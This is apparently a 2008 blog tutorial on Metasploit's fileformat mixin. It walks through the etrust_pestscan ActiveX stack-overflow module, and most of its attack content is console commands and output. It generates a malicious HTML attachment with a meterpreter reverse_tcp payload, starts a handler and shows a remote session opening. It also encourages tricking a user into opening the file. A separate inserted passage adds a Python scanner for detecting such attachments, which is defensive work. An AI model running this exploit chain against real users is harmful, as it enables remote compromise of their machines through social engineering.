Saturday, August 23, 2008

Metasploit and File Format Bugs

Client-side attacks are where it's at, and being able to send a legitimate-looking file to a user to do their double-clicky thing on is the bomb.

MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.

Here is the link to the fileformat mixin:
http://www.metasploit.com/users/mc/rand/fileformat.rb

To use it, you need to add:

require 'msf/core/exploit/fileformat'

to msf3/lib/msf/core/exploit.rb, and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory.

Now, remembering my previous post on adding exploits to metasploit, we can do the same for mixins. So my exploit.rb file actually said:

require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'

And don't worry, if you jacked something up, Metasploit will let you know:

cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load -- /home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)


For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan:
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb


From the description in the module:

This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
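From the defender's side, the interesting thing about this bug class is what the generated attachment has to contain: an HTML file that instantiates an ActiveX control by CLSID and then scripts one of its methods with a huge string. Below is a small scanner, added here as an example and not part of the post or of Metasploit, that parses an HTML file, lists every scripted ActiveX object and the methods called on it, and flags scripts that build an oversized string. The CLSID in the sample, the 1024-byte threshold and the `scan_html` helper are all assumptions of this example.

```python
import re
from html.parser import HTMLParser

# Assumption: anything longer than the module's 1024-byte payload space is "overly long".
MAX_ARG = 1024
LONG_LITERAL = re.compile(r'"[^"]{%d,}"|\'[^\']{%d,}\'' % (MAX_ARG, MAX_ARG))
ARRAY_JOIN = re.compile(r'Array\(\s*(\d+)\s*\)\s*\.join\(')

class ActiveXScanner(HTMLParser):
    """Collect <object classid=...> instantiations and raw <script> bodies."""
    def __init__(self):
        super().__init__()
        self.objects, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object" and a.get("classid"):
            self.objects.append((a.get("id", ""), a["classid"]))
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(text):
    """One finding per scripted ActiveX object: methods called on it, and whether
    the scripts build an oversized string (long literal or Array(N).join)."""
    p = ActiveXScanner()
    p.feed(text)
    script = "\n".join(p.scripts)
    oversized = bool(LONG_LITERAL.search(script)) or any(
        int(n) > MAX_ARG for n in ARRAY_JOIN.findall(script))
    findings = []
    for obj_id, clsid in p.objects:
        calls = re.findall(r"\b%s\.(\w+)\s*\(" % re.escape(obj_id), script) if obj_id else []
        if calls:  # only objects the page actually scripts are interesting
            findings.append({"id": obj_id, "classid": clsid,
                             "methods": sorted(set(calls)), "oversized_arg": oversized})
    return findings

# Constructed sample shaped like the attachment the post describes: it scripts a control's
# Initialize() with a huge string. The CLSID is a placeholder, not ppctl.dll's real one.
SAMPLE = """<html><body>
<object id="pest" classid="clsid:PLACEHOLDER-0000-0000-0000-000000000000"></object>
<script>
var buf = new Array(2000).join("A");
pest.Initialize(buf);
</script></body></html>"""
```

Run it over attachments pulled from a mail gateway or proxy; a hit with `oversized_arg` set and a CLSID you don't expect to see in mail is worth a closer look, while a scripted control with normal-sized arguments is just context.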

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info

       Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
    Version: $Revision:$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License

Provided by:
  MC

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  MSF              no        The file name.

Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This module exploits a stack overflow in CA eTrust PestPatrol. When
  sending an overly long string to the Initialize() property of
  ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
  code. This control is not marked safe for scripting, so choose your
  attack vector accordingly.

References:
  http://www.w00t-shell.net/#
  http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options

Module options:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  MSF              no        The file name.

Exploit target:

  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options

Module options:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  DEMO.html        no        The file name.

Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting                                 Required  Description
  ----      ---------------                                 --------  -----------
  DLL       /home/cg/evil/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
  EXITFUNC  process                                         yes       Exit technique: seh, thread, process
  LHOST     192.168.0.101                                   yes       The local address
  LPORT     4444                                            yes       The local port

Exploit target:

  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >


Fileformat bugs are going to require you to run the multi/handler so you can catch the returning shells.

cg@WPAD:~/evil/msf3$ ./msfcli

Usage: ./msfcli [mode]
====================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...

***Work your magic to get the client to open the html file***

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)

meterpreter >